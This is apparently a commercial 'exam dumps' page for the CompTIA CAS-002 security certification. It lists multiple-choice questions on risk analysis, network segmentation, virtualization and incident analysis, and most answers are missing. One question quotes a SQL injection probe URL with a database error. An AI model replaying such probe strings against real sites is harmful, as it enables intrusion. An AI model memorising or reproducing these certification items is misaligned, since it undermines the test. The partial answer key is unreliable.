★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW CAS-002 Exam Dumps (PDF & VCE):
Available on: https://www.certleader.com/CAS-002-dumps.html


It is more faster and easier to pass the CompTIA CAS-002 exam by using Approved CompTIA CompTIA Advanced Security Practitioner (CASP) questuins and answers. Immediate access to the Refresh CAS-002 Exam and find the same core area CAS-002 questions with professionally verified answers, then PASS your exam with a high score now.

2021 Mar CAS-002 exam prep

Q1. - (Topic 5) 

A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization’s customer database. The database will be accessed by both the company’s users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). 

A. Physical penetration test of the datacenter to ensure there are appropriate controls. 

B. Penetration testing of the solution to ensure that the customer data is well protected. 

C. Security clauses are implemented into the contract such as the right to audit. 

D. Review of the organizations security policies, procedures and relevant hosting certifications. 

E. Code review of the solution to ensure that there are no back doors located in the software. 

Answer: C,D 


Q2. - (Topic 4) 

An Association is preparing to upgrade their firewalls at five locations around the United States. Each of the three vendor’s RFP responses is in-line with the security and other requirements. Which of the following should the security administrator do to ensure the firewall platform is appropriate for the Association? 

A. Correlate current industry research with the RFP responses to ensure validity. 

B. Create a lab environment to evaluate each of the three firewall platforms. 

C. Benchmark each firewall platform’s capabilities and experiences with similar sized companies. 

D. Develop criteria and rate each firewall platform based on information in the RFP responses. 

Answer:


Q3. - (Topic 5) 

Company XYZ is building a new customer facing website which must access some corporate resources. The company already has an internal facing web server and a separate server supporting an extranet to which suppliers have access. The extranet web server is located in a network DMZ. The internal website is hosted on a laptop on the internal corporate network. The internal network does not restrict traffic between any internal hosts. Which of the following locations will BEST secure both the intranet and the customer facing website? 

A. The existing internal network segment 

B. Dedicated DMZ network segments 

C. The existing extranet network segment 

D. A third-party web hosting company 

Answer:


Q4. - (Topic 1) 

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company’s online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation? 

A. $60,000 

B. $100,000 

C. $140,000 

D. $200,000 

Answer:


Q5. - (Topic 3) 

An administrator at a small company replaces servers whenever budget money becomes available. Over the past several years the company has acquired and still uses 20 servers and 50 desktops from five different computer manufacturers. Which of the following are management challenges and risks associated with this style of technology lifecycle management? 

A. Decreased security posture, decommission of outdated hardware, inability to centrally manage, and performance bottlenecks on old hardware. 

B. Increased mean time to failure rate of legacy servers, OS variances, patch availability, and ability to restore to dissimilar hardware. 

C. OS end-of-support issues, ability to backup data, hardware parts availability, and firmware update availability and management. 

D. Inability to use virtualization, trusted OS complexities, and multiple patch versions based on OS dependency. 

Answer:


Improve CAS-002 practice exam:

Q6. - (Topic 2) 

A security tester is testing a website and performs the following manual query: 

https://www.comptia.com/cookies.jsp?products=5%20and%201=1 

The following response is received in the payload: 

“ORA-000001: SQL command not properly ended” 

Which of the following is the response an example of? 

A. Fingerprinting 

B. Cross-site scripting 

C. SQL injection 

D. Privilege escalation 

Answer:


Q7. - (Topic 5) 

A security manager is concerned about performance and patch management, and, as a result, wants to implement a virtualization strategy to avoid potential future OS vulnerabilities in the host system. The IT manager wants a strategy that would provide the hypervisor with direct communications with the underlying physical hardware allowing the hardware resources to be paravirtualized and delivered to the guest machines. Which of the following recommendations from the server administrator BEST meets the IT and security managers’ requirements? (Select TWO). 

A. Nested virtualized hypervisors 

B. Type 1 hypervisor 

C. Hosted hypervisor with a three layer software stack 

D. Type 2 hypervisor 

E. Bare metal hypervisor with a software stack of two layers 

Answer: B,E 


Q8. - (Topic 3) 

A company receives a subpoena for email that is four years old. Which of the following should the company consult to determine if it can provide the email in question? 

A. Data retention policy 

B. Business continuity plan 

C. Backup and archive processes 

D. Electronic inventory 

Answer:


Q9. - (Topic 5) 

A security administrator is investigating the compromise of a software distribution website. Forensic analysis shows that several popular files are infected with malicious code. However, comparing a hash of the infected files with the original, non-infected files which were restored from backup, shows that the hash is the same. Which of the following explains this? 

A. The infected files were using obfuscation techniques to evade detection by antivirus software. 

B. The infected files were specially crafted to exploit a collision in the hash function. 

C. The infected files were using heuristic techniques to evade detection by antivirus software. 

D. The infected files were specially crafted to exploit diffusion in the hash function. 

Answer:

491. - (Topic 5) 

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? 

A. The corporate network is the only network that is audited by regulators and customers. 

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. 

C. Home networks are unknown to attackers and less likely to be targeted directly. 

D. Employees are more likely to be using personal computers for general web browsing when they are at home. 

Answer:


Q10. - (Topic 5) 

A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool? 

A. The tool could show that input validation was only enabled on the client side 

B. The tool could enumerate backend SQL database table and column names 

C. The tool could force HTTP methods such as DELETE that the server has denied 

D. The tool could fuzz the application to determine where memory leaks occur 

Answer: